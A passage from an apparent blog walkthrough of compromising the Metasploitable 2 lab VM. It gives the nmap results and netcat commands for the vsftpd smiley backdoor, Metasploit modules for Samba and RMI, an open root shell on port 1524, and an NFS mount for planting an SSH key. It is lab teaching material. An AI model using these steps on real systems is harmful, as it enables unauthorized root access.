</span><span class='line'><span class="mi">3632</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">distccd</span>     <span class="n">distccd</span> <span class="n">v1</span> <span class="p">((</span><span class="no">GNU</span><span class="p">)</span> <span class="mi">4</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">4</span> <span class="p">(</span><span class="no">Ubuntu</span> <span class="mi">4</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">4</span><span class="o">-</span><span class="mi">1</span><span class="n">ubuntu4</span><span class="p">))</span>
</span><span class='line'><span class="mi">5432</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">postgresql</span>  <span class="no">PostgreSQL</span> <span class="no">DB</span> <span class="mi">8</span><span class="o">.</span><span class="mi">3</span><span class="o">.</span><span class="mi">0</span> <span class="o">-</span> <span class="mi">8</span><span class="o">.</span><span class="mi">3</span><span class="o">.</span><span class="mi">7</span>
</span><span class='line'><span class="mi">5900</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">vnc</span>         <span class="no">VNC</span> <span class="p">(</span><span class="n">protocol</span> <span class="mi">3</span><span class="o">.</span><span class="mi">3</span><span class="p">)</span>
</span><span class='line'><span class="mi">6000</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="no">X11</span>         <span class="p">(</span><span class="n">access</span> <span class="n">denied</span><span class="p">)</span>
</span><span class='line'><span class="mi">6667</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">irc</span>         <span class="no">Unreal</span> <span class="n">ircd</span>
</span><span class='line'><span class="mi">6697</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">irc</span>         <span class="no">Unreal</span> <span class="n">ircd</span>
</span><span class='line'><span class="mi">8009</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">ajp13</span>       <span class="no">Apache</span> <span class="no">Jserv</span> <span class="p">(</span><span class="no">Protocol</span> <span class="n">v1</span><span class="o">.</span><span class="mi">3</span><span class="p">)</span>
</span><span class='line'><span class="mi">8180</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">http</span>        <span class="no">Apache</span> <span class="no">Tomcat</span><span class="o">/</span><span class="no">Coyote</span> <span class="no">JSP</span> <span class="n">engine</span> <span class="mi">1</span><span class="o">.</span><span class="mi">1</span>
</span><span class='line'><span class="mi">8787</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">drb</span>         <span class="no">Ruby</span> <span class="no">DRb</span> <span class="no">RMI</span> <span class="p">(</span><span class="no">Ruby</span> <span class="mi">1</span><span class="o">.</span><span class="mi">8</span><span class="p">;</span> <span class="n">path</span> <span class="sr">/usr/</span><span class="n">lib</span><span class="o">/</span><span class="n">ruby</span><span class="o">/</span><span class="mi">1</span><span class="o">.</span><span class="mi">8</span><span class="o">/</span><span class="n">drb</span><span class="p">)</span>
</span><span class='line'><span class="no">MAC</span> <span class="ss">Address</span><span class="p">:</span> <span class="mo">00</span><span class="p">:</span><span class="mi">0</span><span class="ss">C</span><span class="p">:</span><span class="mi">29</span><span class="ss">:FA:DD</span><span class="p">:</span><span class="mi">2</span><span class="n">A</span> <span class="p">(</span><span class="no">VMware</span><span class="p">)</span>
</span></code></pre></td></tr></table></div></figure>
<p>Later on, we started to exploit the ports one by one using <strong><em><code>Metasploit</code></em></strong>. Before we started to exploit, we did a
google search on each version to identify whether we could be able to exploit them.<p /></p>

<h4>Note:</h4>

<p><p>A Vulnerability Assessment can be done on the corresponding target ip to identify whether the running serives are vulnerable to exploit.<p />
<p>Vulnerability Assessment Tools:<p />
(1)Nessus
(2)OpenVAS
(3)ImmunityCanvas
(4)Qualys</p>

<h2>FTP Backdoor</h2>

<h4>1.Gaining Shell via Metasploit</h4>

<p><p>The Virtual machine was found to be running a <strong><em><code>FTP</code></em></strong> service with version <strong><em><code>vsftpd 2.3.4</code></em></strong> which was vulnerable to a backdoor
command execution. We ran the metasploit <strong><em><code>msfconsole</code></em></strong> in kali linux and made a search on <strong><em>vsftpd</em></strong>  which gave us exploit module
for the backdoor command execution for the specific <strong><em>vsftpd 2.3.4</em></strong>
<figure class='code'><figcaption><span>Vsftpd 2.3.4</span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">msf</span> <span class="o">&gt;</span> <span class="n">search</span> <span class="n">vsftpd</span>
</span><span class='line'><span class="no">Matching</span> <span class="no">Modules</span>
</span><span class='line'><span class="o">================</span>
</span><span class='line'>   <span class="no">Name</span>                                  <span class="no">Disclosure</span> <span class="no">Date</span>  <span class="no">Rank</span>       <span class="no">Description</span>
</span><span class='line'>   <span class="o">&mdash;-</span>                                  <span class="o">&mdash;&mdash;&mdash;&mdash;&mdash;</span>  <span class="o">&mdash;-</span>       <span class="o">&mdash;&mdash;&mdash;&ndash;</span>
</span><span class='line'>   <span class="n">exploit</span><span class="o">/</span><span class="n">unix</span><span class="o">/</span><span class="n">ftp</span><span class="o">/</span><span class="n">vsftpd_234_backdoor</span>  <span class="mi">2011</span><span class="o">-</span><span class="mo">07</span><span class="o">-</span><span class="mo">03</span>       <span class="n">excellent</span>  <span class="no">VSFTPD</span> <span class="n">v2</span><span class="o">.</span><span class="mi">3</span><span class="o">.</span><span class="mi">4</span> <span class="no">Backdoor</span> <span class="no">Command</span> <span class="no">Execution</span>
</span></code></pre></td></tr></table></div></figure>
Kick this module into the msfconsole to make a backdoor to gain a interactive shell.</p>

<p><img src="http://i.imgur.com/QBxOc7w.png"></p>

<p>Finally we gained the shell with the help of metasploit vsftpd backdoor module.</p>

<h4>2.Gaining shell via Netcat</h4>

<p><p> We can also backdoor ftp by running up <code>Netcat</code> (Reads and writes to TCP and UDP network connections) to gain a shell.<p />
<p>Initially run this command in separate terminal to make a connection to <code>FTP</code> port <code>21</code> via USER <code>anyname:)</code> along with the smile <code>:)</code> and PASS with <code>anypassword</code>
<p />
<figure class='code'><figcaption><span>Netcat FTP </span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># nc 192.168.2.7 21 -v</span>
</span><span class='line'><span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span><span class="p">:</span> <span class="n">inverse</span> <span class="n">host</span> <span class="n">lookup</span> <span class="ss">failed</span><span class="p">:</span> <span class="no">Unknown</span> <span class="n">server</span> <span class="n">error</span> <span class="p">:</span> <span class="no">Connection</span> <span class="n">timed</span> <span class="n">out</span>
</span><span class='line'><span class="p">(</span><span class="no">UNKNOWN</span><span class="p">)</span> <span class="o">[</span><span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span><span class="o">]</span> <span class="mi">21</span> <span class="p">(</span><span class="n">ftp</span><span class="p">)</span> <span class="nb">open</span>
</span><span class='line'><span class="mi">220</span> <span class="p">(</span><span class="n">vsFTPd</span> <span class="mi">2</span><span class="o">.</span><span class="mi">3</span><span class="o">.</span><span class="mi">4</span><span class="p">)</span>
</span><span class='line'><span class="no">USER</span> <span class="ss">sellva</span><span class="p">:)</span>
</span><span class='line'><span class="mi">331</span> <span class="no">Please</span> <span class="n">specify</span> <span class="n">the</span> <span class="n">password</span><span class="o">.</span>
</span><span class='line'><span class="no">PASS</span> <span class="n">pass</span>
</span></code></pre></td></tr></table></div></figure>
<p>Then open up a new terminal without closing the above running terminal, type in the nc command show below. Where Port <code>6200</code> is a Backdoor port for the ftp
and -v mentions Verbose.<p/><p> You can also do without <code>-v</code>, it just print out messages on Standard Error, such as when a connection occurs.<p/></p>

<p><figure class='code'><figcaption><span>Netcat FTP</span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># nc 192.168.2.7 6200 -v</span>
</span><span class='line'><span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span><span class="p">:</span> <span class="n">inverse</span> <span class="n">host</span> <span class="n">lookup</span> <span class="ss">failed</span><span class="p">:</span> <span class="no">Unknown</span> <span class="n">server</span> <span class="n">error</span> <span class="p">:</span> <span class="no">Connection</span> <span class="n">timed</span> <span class="n">out</span>
</span><span class='line'><span class="p">(</span><span class="no">UNKNOWN</span><span class="p">)</span> <span class="o">[</span><span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span><span class="o">]</span> <span class="mi">6200</span> <span class="p">(</span><span class="sc">?)</span> <span class="nb">open</span>
</span><span class='line'><span class="nb">id</span>
</span><span class='line'><span class="n">uid</span><span class="o">=</span><span class="mi">0</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="n">gid</span><span class="o">=</span><span class="mi">0</span><span class="p">(</span><span class="n">root</span><span class="p">)</span>
</span><span class='line'><span class="n">whoami</span>
</span><span class='line'><span class="n">root</span>
</span><span class='line'><span class="n">uname</span> <span class="o">-</span><span class="n">a</span>
</span><span class='line'><span class="no">Linux</span> <span class="n">metasploitable</span> <span class="mi">2</span><span class="o">.</span><span class="mi">6</span><span class="o">.</span><span class="mi">24</span><span class="o">-</span><span class="mi">16</span><span class="o">-</span><span class="n">server</span> <span class="c1">#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</span>
</span><span class='line'><span class="n">ifconfig</span>
</span><span class='line'><span class="n">eth0</span>      <span class="no">Link</span> <span class="ss">encap</span><span class="p">:</span><span class="no">Ethernet</span>  <span class="no">HWaddr</span> <span class="mo">00</span><span class="p">:</span><span class="mi">0</span><span class="ss">c</span><span class="p">:</span><span class="mi">29</span><span class="ss">:fa:dd</span><span class="p">:</span><span class="mi">2</span><span class="n">a</span>
</span><span class='line'>          <span class="n">inet</span> <span class="ss">addr</span><span class="p">:</span><span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span>  <span class="ss">Bcast</span><span class="p">:</span><span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">255</span>  <span class="ss">Mask</span><span class="p">:</span><span class="mi">255</span><span class="o">.</span><span class="mi">255</span><span class="o">.</span><span class="mi">255</span><span class="o">.</span><span class="mi">0</span>
</span><span class='line'>          <span class="n">inet6</span> <span class="ss">addr</span><span class="p">:</span> <span class="n">fe80</span><span class="o">::</span><span class="mi">20</span><span class="ss">c</span><span class="p">:</span><span class="mi">29</span><span class="ss">ff</span><span class="p">:</span><span class="ss">fefa</span><span class="p">:</span><span class="n">dd2a</span><span class="o">/</span><span class="mi">64</span> <span class="ss">Scope</span><span class="p">:</span><span class="no">Link</span>
</span><span class='line'>          <span class="no">UP</span> <span class="no">BROADCAST</span> <span class="no">RUNNING</span> <span class="no">MULTICAST</span>  <span class="ss">MTU</span><span class="p">:</span><span class="mi">1500</span>  <span class="ss">Metric</span><span class="p">:</span><span class="mi">1</span>
</span><span class='line'>          <span class="no">RX</span> <span class="ss">packets</span><span class="p">:</span><span class="mi">72642</span> <span class="ss">errors</span><span class="p">:</span><span class="mi">0</span> <span class="ss">dropped</span><span class="p">:</span><span class="mi">0</span> <span class="ss">overruns</span><span class="p">:</span><span class="mi">0</span> <span class="ss">frame</span><span class="p">:</span><span class="mi">0</span>
</span><span class='line'>          <span class="no">TX</span> <span class="ss">packets</span><span class="p">:</span><span class="mi">20426</span> <span class="ss">errors</span><span class="p">:</span><span class="mi">0</span> <span class="ss">dropped</span><span class="p">:</span><span class="mi">0</span> <span class="ss">overruns</span><span class="p">:</span><span class="mi">0</span> <span class="ss">carrier</span><span class="p">:</span><span class="mi">0</span>
</span><span class='line'>          <span class="ss">collisions</span><span class="p">:</span><span class="mi">0</span> <span class="ss">txqueuelen</span><span class="p">:</span><span class="mi">1000</span>
</span><span class='line'>          <span class="no">RX</span> <span class="ss">bytes</span><span class="p">:</span><span class="mi">77577863</span> <span class="p">(</span><span class="mi">73</span><span class="o">.</span><span class="mi">9</span> <span class="no">MB</span><span class="p">)</span>  <span class="no">TX</span> <span class="ss">bytes</span><span class="p">:</span><span class="mi">1589401</span> <span class="p">(</span><span class="mi">1</span><span class="o">.</span><span class="mi">5</span> <span class="no">MB</span><span class="p">)</span>
</span><span class='line'>          <span class="ss">Interrupt</span><span class="p">:</span><span class="mi">19</span> <span class="no">Base</span> <span class="ss">address</span><span class="p">:</span><span class="mh">0x2000</span>
</span><span class='line'>
</span><span class='line'><span class="n">lo</span>        <span class="no">Link</span> <span class="ss">encap</span><span class="p">:</span><span class="no">Local</span> <span class="no">Loopback</span>
</span><span class='line'>          <span class="n">inet</span> <span class="ss">addr</span><span class="p">:</span><span class="mi">127</span><span class="o">.</span><span class="mi">0</span><span class="o">.</span><span class="mi">0</span><span class="o">.</span><span class="mi">1</span>  <span class="ss">Mask</span><span class="p">:</span><span class="mi">255</span><span class="o">.</span><span class="mi">0</span><span class="o">.</span><span class="mi">0</span><span class="o">.</span><span class="mi">0</span>
</span><span class='line'>          <span class="n">inet6</span> <span class="ss">addr</span><span class="p">:</span> <span class="o">::</span><span class="mi">1</span><span class="o">/</span><span class="mi">128</span> <span class="ss">Scope</span><span class="p">:</span><span class="no">Host</span>
</span><span class='line'>          <span class="no">UP</span> <span class="no">LOOPBACK</span> <span class="no">RUNNING</span>  <span class="ss">MTU</span><span class="p">:</span><span class="mi">16436</span>  <span class="ss">Metric</span><span class="p">:</span><span class="mi">1</span>
</span><span class='line'>          <span class="no">RX</span> <span class="ss">packets</span><span class="p">:</span><span class="mi">1670</span> <span class="ss">errors</span><span class="p">:</span><span class="mi">0</span> <span class="ss">dropped</span><span class="p">:</span><span class="mi">0</span> <span class="ss">overruns</span><span class="p">:</span><span class="mi">0</span> <span class="ss">frame</span><span class="p">:</span><span class="mi">0</span>
</span><span class='line'>          <span class="no">TX</span> <span class="ss">packets</span><span class="p">:</span><span class="mi">1670</span> <span class="ss">errors</span><span class="p">:</span><span class="mi">0</span> <span class="ss">dropped</span><span class="p">:</span><span class="mi">0</span> <span class="ss">overruns</span><span class="p">:</span><span class="mi">0</span> <span class="ss">carrier</span><span class="p">:</span><span class="mi">0</span>
</span><span class='line'>          <span class="ss">collisions</span><span class="p">:</span><span class="mi">0</span> <span class="ss">txqueuelen</span><span class="p">:</span><span class="mi">0</span>
</span><span class='line'>          <span class="no">RX</span> <span class="ss">bytes</span><span class="p">:</span><span class="mi">793069</span> <span class="p">(</span><span class="mi">774</span><span class="o">.</span><span class="mi">4</span> <span class="no">KB</span><span class="p">)</span>  <span class="no">TX</span> <span class="ss">bytes</span><span class="p">:</span><span class="mi">793069</span> <span class="p">(</span><span class="mi">774</span><span class="o">.</span><span class="mi">4</span> <span class="no">KB</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="n">ls</span>
</span><span class='line'><span class="n">bin</span>
</span><span class='line'><span class="n">boot</span>
</span><span class='line'><span class="n">cdrom</span>
</span><span class='line'><span class="n">dev</span>
</span><span class='line'><span class="n">etc</span>
</span><span class='line'><span class="n">home</span>
</span></code></pre></td></tr></table></div></figure>
<p>Voila!!!Finally we also got a shell with the help of Netcat tool.<p/></p>

<h2>Samba Exploit</h2>

<p><p>The current version of <code>samba server</code> installed on the remote host is affected by a command execution vulerability,
where there is no needed of authentication to exploit this vulnerability. We kick started the metasploit, and we chose the below exploit module
which helped us to gain the Root access of the remote system.<p/></p>

<p><img src="http://i.imgur.com/OsaoIOl.png"></p>

<p><p>Finally!!! We rooted into remote system using the samba exploit.<p /></p>

<h2>RMI Registry Exploit</h2>

<p><p>After some break, we analyzed the nmap result along with some google results , we came to know that the remote
machine runs <strong><em><code>rmiregistry</code></em></strong> on port <strong><em>1099</em></strong> was found to be vulnerable. We exploited the same using metasploit <code>java_rmi_server</code> module
to gain root access to the remote system.<p/></p>

<p><img src="http://i.imgur.com/sqhjAFy.png"></p>

<h2>Root Access</h2>

<p><p> The remote system was running up with a service named <code>shell</code>  on port <code>1524</code>, we made a <code>Netcat</code> connection to the port and wow!
i was not prompted with any user name and password for entering. Directly i was able to access the root shell.</p>

<p><img src="http://i.imgur.com/igj2yb8.png"></p>

<h2>SSH through NFS</h2>

<p>Network File system <code>[NFS]</code> was found to be open on Port <code>2049</code> where RPC was also found to be open on port <code>111</code>. So we made a <code>rpcinfo</code> to identify NFS
and <code>showmount</code> to identify the mountpoint to export a local file to remote system.
<figure class='code'><figcaption><span>Rpcinfo</span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># rpcinfo -p 192.168.2.7</span>
</span><span class='line'>   <span class="n">program</span> <span class="n">vers</span> <span class="n">proto</span>   <span class="n">port</span>  <span class="n">service</span>
</span><span class='line'>    <span class="mi">100000</span>    <span class="mi">2</span>   <span class="n">tcp</span>    <span class="mi">111</span>  <span class="n">portmapper</span>
</span><span class='line'>    <span class="mi">100000</span>    <span class="mi">2</span>   <span class="n">udp</span>    <span class="mi">111</span>  <span class="n">portmapper</span>
</span><span class='line'>    <span class="mi">100024</span>    <span class="mi">1</span>   <span class="n">udp</span>  <span class="mi">47286</span>  <span class="n">status</span>
</span><span class='line'>    <span class="mi">100024</span>    <span class="mi">1</span>   <span class="n">tcp</span>  <span class="mi">43411</span>  <span class="n">status</span>
</span><span class='line'>    <span class="mi">100003</span>    <span class="mi">2</span>   <span class="n">udp</span>   <span class="mi">2049</span>  <span class="n">nfs</span>
</span><span class='line'>    <span class="mi">100003</span>    <span class="mi">3</span>   <span class="n">udp</span>   <span class="mi">2049</span>  <span class="n">nfs</span>
</span><span class='line'>    <span class="mi">100003</span>    <span class="mi">4</span>   <span class="n">udp</span>   <span class="mi">2049</span>  <span class="n">nfs</span>
</span><span class='line'>    <span class="mi">100021</span>    <span class="mi">1</span>   <span class="n">udp</span>  <span class="mi">58082</span>  <span class="n">nlockmgr</span>
</span><span class='line'>    <span class="mi">100021</span>    <span class="mi">3</span>   <span class="n">udp</span>  <span class="mi">58082</span>  <span class="n">nlockmgr</span>
</span><span class='line'>    <span class="mi">100021</span>    <span class="mi">4</span>   <span class="n">udp</span>  <span class="mi">58082</span>  <span class="n">nlockmgr</span>
</span><span class='line'>    <span class="mi">100003</span>    <span class="mi">2</span>   <span class="n">tcp</span>   <span class="mi">2049</span>  <span class="n">nfs</span>
</span><span class='line'>    <span class="mi">100003</span>    <span class="mi">3</span>   <span class="n">tcp</span>   <span class="mi">2049</span>  <span class="n">nfs</span>
</span><span class='line'>    <span class="mi">100003</span>    <span class="mi">4</span>   <span class="n">tcp</span>   <span class="mi">2049</span>  <span class="n">nfs</span>
</span><span class='line'>    <span class="mi">100021</span>    <span class="mi">1</span>   <span class="n">tcp</span>  <span class="mi">51154</span>  <span class="n">nlockmgr</span>
</span><span class='line'>    <span class="mi">100021</span>    <span class="mi">3</span>   <span class="n">tcp</span>  <span class="mi">51154</span>  <span class="n">nlockmgr</span>
</span><span class='line'>    <span class="mi">100021</span>    <span class="mi">4</span>   <span class="n">tcp</span>  <span class="mi">51154</span>  <span class="n">nlockmgr</span>
</span><span class='line'>    <span class="mi">100005</span>    <span class="mi">1</span>   <span class="n">udp</span>  <span class="mi">47566</span>  <span class="n">mountd</span>
</span><span class='line'>    <span class="mi">100005</span>    <span class="mi">1</span>   <span class="n">tcp</span>  <span class="mi">44007</span>  <span class="n">mountd</span>
</span><span class='line'>    <span class="mi">100005</span>    <span class="mi">2</span>   <span class="n">udp</span>  <span class="mi">47566</span>  <span class="n">mountd</span>
</span><span class='line'>    <span class="mi">100005</span>    <span class="mi">2</span>   <span class="n">tcp</span>  <span class="mi">44007</span>  <span class="n">mountd</span>
</span><span class='line'>    <span class="mi">100005</span>    <span class="mi">3</span>   <span class="n">udp</span>  <span class="mi">47566</span>  <span class="n">mountd</span>
</span><span class='line'>    <span class="mi">100005</span>    <span class="mi">3</span>   <span class="n">tcp</span>  <span class="mi">44007</span>  <span class="n">mountd</span>
</span></code></pre></td></tr></table></div></figure>
<p> Rpcinfo shows the NFS is open.<p/></p>

<p><figure class='code'><figcaption><span>Showmount</span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># showmount -e 192.168.2.7</span>
</span><span class='line'><span class="no">Export</span> <span class="n">list</span> <span class="k">for</span> <span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span><span class="p">:</span>
</span><span class='line'><span class="sr">/ *</span>
</span></code></pre></td></tr></table></div></figure>
<p> using showmount -e we found that the &ldquo;/&rdquo; share (the root of the file system) is being exported.By making use of
this share we started to access the system with a writeable filesystem.<p/></p>

<p><p>Based on nmap result we found that <code>SSH</code> service was running on port <code>22</code>, So we started to generate a new SSH key on our attacking system,
Later we created a new directory for mounting to the NFS export and add our key to the root user account&rsquo;s authorized_keys file.<p/>
<figure class='code'><figcaption><span>SSH keygen</span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># ssh-keygen </span>
</span><span class='line'><span class="no">Generating</span> <span class="kp">public</span><span class="o">/</span><span class="kp">private</span> <span class="n">rsa</span> <span class="n">key</span> <span class="n">pair</span><span class="o">.</span>
</span><span class='line'><span class="no">Enter</span> <span class="n">file</span> <span class="k">in</span> <span class="n">which</span> <span class="n">to</span> <span class="n">save</span> <span class="n">the</span> <span class="n">key</span> <span class="p">(</span><span class="sr">/root/</span><span class="o">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">id_rsa</span><span class="p">):</span>
</span><span class='line'><span class="sr">/root/</span><span class="o">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">id_rsa</span> <span class="n">already</span> <span class="n">exists</span><span class="o">.</span>
</span><span class='line'><span class="no">Overwrite</span> <span class="p">(</span><span class="n">y</span><span class="o">/</span><span class="n">n</span><span class="p">)?</span> <span class="n">y</span>
</span><span class='line'><span class="no">Enter</span> <span class="n">passphrase</span> <span class="p">(</span><span class="n">empty</span> <span class="k">for</span> <span class="n">no</span> <span class="n">passphrase</span><span class="p">):</span>
</span><span class='line'><span class="no">Enter</span> <span class="n">same</span> <span class="n">passphrase</span> <span class="ss">again</span><span class="p">:</span>
</span><span class='line'><span class="no">Your</span> <span class="n">identification</span> <span class="n">has</span> <span class="n">been</span> <span class="n">saved</span> <span class="k">in</span> <span class="sr">/root/</span><span class="o">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">id_rsa</span><span class="o">.</span>
</span><span class='line'><span class="no">Your</span> <span class="kp">public</span> <span class="n">key</span> <span class="n">has</span> <span class="n">been</span> <span class="n">saved</span> <span class="k">in</span> <span class="sr">/root/</span><span class="o">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">id_rsa</span><span class="o">.</span><span class="n">pub</span><span class="o">.</span>
</span><span class='line'><span class="no">The</span> <span class="n">key</span> <span class="n">fingerprint</span> <span class="ss">is</span><span class="p">:</span>
</span><span class='line'><span class="mi">9</span><span class="ss">d</span><span class="p">:</span><span class="mi">69</span><span class="ss">:ed:f6:c8:fd</span><span class="p">:</span><span class="mi">55</span><span class="ss">:e7:e6:de</span><span class="p">:</span><span class="mi">9</span><span class="ss">b</span><span class="p">:</span><span class="ss">d8</span><span class="p">:</span><span class="mi">18</span><span class="ss">:b3</span><span class="p">:</span><span class="mi">48</span><span class="p">:</span><span class="mi">18</span> <span class="n">root</span><span class="vi">@Hacker</span>
</span><span class='line'><span class="no">The</span> <span class="n">key</span><span class="err">&#39;</span><span class="n">s</span> <span class="n">randomart</span> <span class="n">image</span> <span class="ss">is</span><span class="p">:</span>
</span><span class='line'><span class="o">+&ndash;[</span> <span class="no">RSA</span> <span class="mi">2048</span><span class="o">]&mdash;-+</span>
</span><span class='line'><span class="o">|</span>                 <span class="o">|</span>
</span><span class='line'><span class="o">|</span>                 <span class="o">|</span>
</span><span class='line'><span class="o">|</span>                 <span class="o">|</span>
</span><span class='line'><span class="o">|</span>         <span class="o">.</span> <span class="o">+</span>     <span class="o">|</span>
</span><span class='line'><span class="o">|</span>        <span class="no">SE</span><span class="o">=</span> <span class="o">.</span>   <span class="n">o</span><span class="o">|</span>
</span><span class='line'><span class="o">|</span>         <span class="o">.</span><span class="n">o</span><span class="o">.</span>   <span class="o">.</span><span class="n">o</span><span class="o">|</span>
</span><span class='line'><span class="o">|</span>         <span class="o">.</span> <span class="o">.</span><span class="n">oo</span>  <span class="o">+|</span>
</span><span class='line'><span class="o">|</span>          <span class="o">.</span><span class="n">o</span><span class="o">.</span><span class="n">+</span><span class="no">Bo</span><span class="o">+|</span>
</span><span class='line'><span class="o">|</span>           <span class="o">.</span><span class="n">o</span><span class="o">+</span><span class="n">o</span><span class="o"><em>*|</span>
</span><span class='line'><span class="o">+&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;+</span>
</span><span class='line'><span class="o">&mdash;&gt;</span><span class="n">create</span> <span class="n">a</span> <span class="n">directory</span> <span class="n">anywere</span> <span class="k">for</span> <span class="n">mounting</span> <span class="n">purpose</span>
</span><span class='line'>
</span><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># mkdir /tmp/dsm</span>
</span><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># mount -t nfs 192.168.2.7:/ /tmp/dsm/ -o nolock</span>
</span><span class='line'>
